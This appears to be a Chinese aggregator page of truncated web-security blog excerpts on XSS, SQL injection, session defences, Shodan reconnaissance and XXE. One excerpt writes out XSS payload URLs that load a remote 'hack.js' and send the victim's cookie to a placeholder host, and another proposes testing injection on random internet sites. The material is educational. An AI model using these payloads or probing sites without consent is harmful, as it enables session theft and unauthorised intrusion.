web安全

【web安全】浅谈web安全之XSS

假装没事ソ 提交于 2020-02-25 17:28:50
XSS定义   XSS, 即为(Cross Site Scripting), 中文名为 跨站脚本 , 是发生在 目标用户的浏览器 层面上的,当渲染DOM树的过程成发生了 不在预期内 执行的JS代码时,就发生了XSS攻击。 跨站脚本的重点不在‘跨站’上,而在于‘脚本’上。大多数XSS攻击的主要方式是嵌入一段远程或者第三方域上的JS代码。实际上是在目标网站的作用域下执行了这段js代码。 攻击手段:   1.盗用cookie 获取敏感信息   2.破坏页面结构 插入恶意内容(反射性)   3.利用flash(了解)   4.DDOS(强大 难以防御)     DDOS:分布式拒绝服务攻击(Distributed Denial of Service),简单说就是发送大量请求是使服务器瘫痪。DDos攻击是在DOS攻击基础上的,可以通俗理解,dos是单挑,而ddos是群殴,因为现代技术的发展,dos攻击的杀伤力降低,所以出现了DDOS,攻击者借助公共网络,将大数量的计算机设备联合起来,向一个或多个目标进行攻击。 在技术角度上,DDoS攻击可以针对网络通讯协议的各层,手段大致有:TCP类的SYN Flood、ACK Flood,UDP类的Fraggle、Trinoo,DNS Query Flood,ICMP Flood,Slowloris类等等。一般会根据攻击目标的情况,针对性的把技术手法混合

Web安全篇之SQL注入攻击

萝らか妹 提交于 2020-02-25 03:32:43
在网上找了一篇关于sql注入的解释文章,还有很多技术,走马观花吧 文章来源: http://www.2cto.com/article/201310/250877.html ps:直接copy,格式有点问题~ 大家早上好!今天由我给大家带来《web安全之SQL注入篇》系列晨讲,首先对课程进行简单介绍, SQL注入篇一共分为三讲: 第一讲:“纸上谈兵:我们需要在本地架设注入环境,构造注入语句,了解注入原理。”; 第二讲:“实战演练:我们要在互联网上随机对网站进行友情检测,活学活用,举一反三”; 第三讲:“扩展内容:挂马,提权,留门。此讲内容颇具危害性,不予演示。仅作概述”。 这个主题涉及的东西还是比较多的,结合我们前期所学。主要是让大家切身体会一下,管中窥豹,起到知己知彼的作用。千里之堤溃于蚁穴,以后进入单位,从事相关 程序开发 ,一定要谨小慎微。 问:大家知道骇客们攻击网站主要有哪些手法? SQL注入,旁注,XSS跨站,COOKIE欺骗,DDOS,0day 漏洞 ,社会工程学 等等等等,只要有数据交互,就会存在被入侵风险!哪怕你把网线拔掉,物理隔绝,我还可以利用传感器捕捉电磁辐射信号转换成模拟图像。你把门锁上,我就爬窗户;你把窗户关上,我就翻院墙;你把院墙加高,我就挖地洞。。。道高一尺魔高一丈,我始终坚信计算机不存在绝对的安全,你攻我防,此消彼长,有时候,魔与道只在一念之间。 下面

web安全杂记

拥有回忆 提交于 2020-02-24 21:07:03
session防御方法 1、每当用户登陆的时候就进行重置sessionID 2、sessionID闲置过久时,进行重置sessionID 3、 大部分防止会话劫持的方法对会话固定攻击同样有效。如设置HttpOnly,关闭透明化Session ID,User-Agent验证,Token校验等。 防御方法: 1、 更改Session名称。PHP中Session的默认名称是PHPSESSID,此变量会保存在Cookie中,如果攻击者不分析站点,就不能猜到Session名称,阻挡部分攻击。 2、 关闭透明化Session ID。透明化Session ID指当浏览器中的Http请求没有使用Cookie来存放Session ID时,Session ID则使用URL来传递。 3、 设置HttpOnly。通过设置Cookie的HttpOnly为true,可以防止客户端脚本访问这个Cookie,从而有效的防止XSS攻击。 4、 关闭所有phpinfo类dump request信息的页面。 5、 使用User-Agent检测请求的一致性。但有专家警告不要依赖于检查User-Agent的一致性。这是因为服务器群集中的HTTP代理服务器会对User-Agent进行编辑,而本群集中的多个代理服务器在编辑该值时可能会不一致。 6、 加入Token校验。同样是用于检测请求的一致性,给攻击者制造一些麻烦

Web安全攻防的学习——02—(真实IP地址收集、shodan介绍、shodan安装和命令、检测蜜罐保护、Python-shodan使用、sqlmap介绍、渗透测试环境安装配置)

偶尔善良 提交于 2020-02-24 20:31:21
1、真实IP地址收集 CDN介绍 CDN的全称是Content Delivery Network,即内容分发网络 网址:https://www.cnblogs.com/xinxiucan/p/7832368.html 判断CDN存在 1.通过ping来判断是否存在CDN https://blog.csdn.net/zcmuczx/article/details/79389238 2.通过设置代理或者利用在线ping网站来使用不同地区的ping服务器来测试目标 http://ping.chinaz.com/ 举例:百度存在cdn服务器的地址14.215.177.39 绕过CDN 如果目标没有使用CDN,可以直接利用ping获得IP地址。或者利用在线网站 http://www.ip138.com https://securitytrails.com/ 验证IP地址 利用IP地址对web站点进行访问,如果正常表明是真实IP地址。否则不为真。 2、shodan介绍 信息收集方式 1.主动信息收集:直接与目标进行交互,通过对交互过程中的信息进行收集 2.被动信息收集:通过第三方引擎与目标交互,或不予目标交互查询数据库,获得目标的信息 shodan搜索引擎介绍 虽然目前人们都认为谷歌是最强的 搜索引擎 ,但shodan才是互联网上最可怕的搜索引擎。与谷歌不同的是,shodan不是在网上搜索网址

[web安全原理分析]-XEE漏洞入门

微笑、不失礼 提交于 2020-02-18 21:27:38
前言 1 前言 XXE漏洞 XXE漏洞全称(XML External Entity Injection)即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害。xxe漏洞触发的点往往是可以上传xml文件的位置,没有对上传的xml文件进行过滤,导致可上传恶意xml文件。 XML基础 XML XML(EXtensible Markup Language,可扩展标记语言)用来结构化、存储以及传输信息。 XML文档结构包括3部分:XML声明、文档类型定义(可选)和文档元素 1 <!-- XML声明(定义了XML的版本和编码) --> 2 <?xml version="1.0" encoding="ISO-8859-1"?> 3 4 <!-- 文档类型定义 --> 5 <!DOCTYPE note [ 6 <!ELEMENT note (to,from,heading,body)> 7 <!ELEMENT to (#PCDATA)> 8 <!ELEMENT from (#PCDATA)> 9 <!ELEMENT heading (#PCDATA)> 10 <!ELEMENT body (#PCDATA)> 11 ]> 12 13 <!-- 文档元素 -->

web安全

拜拜、爱过 提交于 2020-02-15 05:48:49
程序员必须要了解的web安全 本文是读书总结,出自《白帽子讲web安全》 ----吴翰清 1.简述 互联网本来是安全的,自从有了研究安全的人之后,互联网就变得不安全了。 1.1什么是安全? 字典的解释是指没有受到威胁、没有危险、危害、损失。 1.2什么情况下会产生安全问题? 类似我们在机场,火车站里面,乘客开始上车之前,都会有一个必要的程序:安全检查。如果没有安全检查我们就会产生我们所谓的安全问题。在安全检查中我们会检查乘客身上是否携带了打火机,可燃液体等危险物品。 从上面我们看出为什么我们会有安全检查呢?归根结底还是信任问题。因为我们的信任关系被破坏,从而产生了安全问题。 1.3怎么进行有效的安全评估? 一个安全评估过程,可以简单地划分为4个阶段:资产等级划分,威胁分析,风险分析,确认解决方案。 资产等级划分:明确我们目标是什么,要保护什么。互联网安全的核心问题,其实是数据安全问题。用户的数据也就是我们需要保护的。 威胁分析:找到所有可能造成危害的来源,一般采用头脑风暴列举所有的情况。 风险分析:预估造成的损失大小。 确认解决安全方案:安全评估的产出物,就是确认安全解决方案。解决方案一定要有针对性,这种针对性是由资产等级划分,威胁分析,风险分析,确认解决方案。 2.浏览器安全 近年来随着互联网的发展,人们发现浏览器才是互联网最大的入口,绝大多数用户使用互联网的工具是浏览器

web安全攻防——shodan的介绍

馋奶兔 提交于 2020-02-14 13:47:04
shodan介绍 shodan是一种搜索引擎,但是它和别的搜索引擎不一样,它搜索的东西与别的大有不同,它是直接搜索网站的后台,与互联网关联的服务器,端口,摄像头等。 shodan网址:https://www.shodan.io/ 我们先要注册一个账号,得到一个API key,这个要等到用命令行初始化的时候用到,那下面我们来说说shodan的使用吧。 shodan网站使用方法 搜索摄像头,搜索框直接输入webcam 通过关键字port指定端口查找,例:port:22 通过关键字host指定具体的IP地址,例:host:127.0.0.1 通过关键字city指定具体的城市,例:city:changsha shodan命令行的使用方式 首先要安装shodan pip install shodan 初始化 shodan init API key 查看服务器数量 shodan count Apache 查看指定IP地址的信息 shodan host 220.181 .38 .148 shodan搜索功能 shodan search apache 获取账号信息 shodan info 获取本机外部ip shodan myip 检测是否有蜜罐保护 那什么是蜜罐保护呢? 蜜罐保护就是为了保护服务器然后做一个与真实服务器相似的“服务器”,诱惑别人攻击,通过别人的攻击方法可以加强自身的防护

【Web安全】越权操作——横向越权与纵向越权

喜夏-厌秋 提交于 2020-02-09 18:29:56
参考: http://blog.csdn.net/github_39104978/article/details/78265433 看了上面的文章,对越权操作的概念还是比较模糊,不明确实际场景。 横向越权的情况: 用户登录模块中,假设用户在忘记密码(未登录)时,想要重置密码。假设接口设计为传参只用传用户名和新的密码。 localhost:8080/user/forget_reset_password.do?username=aaa&passwordNew=xxx 用户先通过密码提示问题并回答问题成功后,跳转到重置密码的页面。该页面下攻击者在浏览器中查看到重置密码的接口后,可以输入任意用户名和密码后提交,如果输入的用户名存在的话就会导致别的用户被修改了密码!同样是普通用户的权限,修改了其他普通用户的信息,这种功能情况即是横向越权。 为了避免以上横向越权的行为,常用办法是在用户回答密码提示问题正确后,服务端随机生成一个Token值返回,并给Token设置过期时间(如30分钟),然后重置密码的接口中要求前端传递该Token,即可确保是当前用户修改自己的密码了。 重置密码的接口改为 localhost:8080/user/forget_reset_password.do?username=aaa&passwordNew=xxx&forgetToken=531ef4b4-9663-4e6d

Web安全

故事扮演 提交于 2020-02-06 10:45:14
网络钓鱼 网络钓鱼 (Phishing) 伪造网页以欺诈方式 获取敏感资料 用户一般是从垃圾邮件中访问网络钓鱼页面 钓鱼网站常用方式: 错误拼写URL链接 Unicode攻击 移除或伪造地址栏 可移动代码 可执行、通过网络发送、在目标电脑上执行的代码程序。 沙箱 应用程序或脚本在另一个应用程序中的运行权限 沙箱 只能访问某些文件和设备 Cookies cookie是存储在计算机上、与特定服务器关联的一小部分信息。当您访问特定网站时,它可能会将信息存储为cookie,每次您重新访问该服务器时,cookie都会被重新发送到服务器, 用于在会话中保存状态信息。 cookie可以保存任何类型的信息。可以保存敏感信息,包括密码,信用卡信息,社保号码等等。 会话型cookie 是浏览器的处理过程中保留的,是暂时性的,当浏览器关闭时则消除; 持久性cookie 是保存在客户端的硬盘上的,浏览器关闭也不会消除。 跨站脚本(XSS) 跨站脚本(XSS):攻击者将脚本代码注入Web应用程序生成的页面 XSS的发起条件 Web服务器 没有对用户输入进行有效性验证 或者验证强度不够,而又 轻易地将它们返回到客户端 允许用户在表格或编辑框中输入不相关字符 存储并允许把用户输入显示在返回给终端的页面上 ,而没有去除非法字符或者重新进行编码 客户端对XSS的防御 基于代理:

web前端安全

假装没事ソ 提交于 2020-02-05 16:05:26
1. xss: cross site scripting,跨站脚本攻击。 1.1 定义: 指的是通过存在安全漏洞的web网站注册用户的浏览器内运行非法的非本站点HTML标签或js进行的一种攻击方式。 1.2 影响: 利用虚假输入表单骗取用户个人信息。利用脚本窃取用户cookie值,帮助攻击者发送恶意请求(如伪造文章或者图片)。 1.3 案例: 1.3.1 反射型:url参数直接注入,案例如下: //1. 正常网站发送请求:参数from=Ace 窗口输入:https://xxx.com/api?from=Ace //2. 尝试xss攻击:js修改弹出弹窗alert() 窗口输入:https://xxx.com/api?from=<script>alert('尝试在当前页面修改js攻击是否成功')</script> //3. 如果尝试xss攻击成功,可以弹出弹窗,则可以尝试用xss获取用户cookie:即执行指定攻击的js代码 窗口输入:https://xxx.com/api?from=<script scr='https://xxx.com/hack.js'></script> //4. 在https://xxx.com/hack.js代码中:获取cookie var img=new Image() img.src='https://xx.com/img?c='+document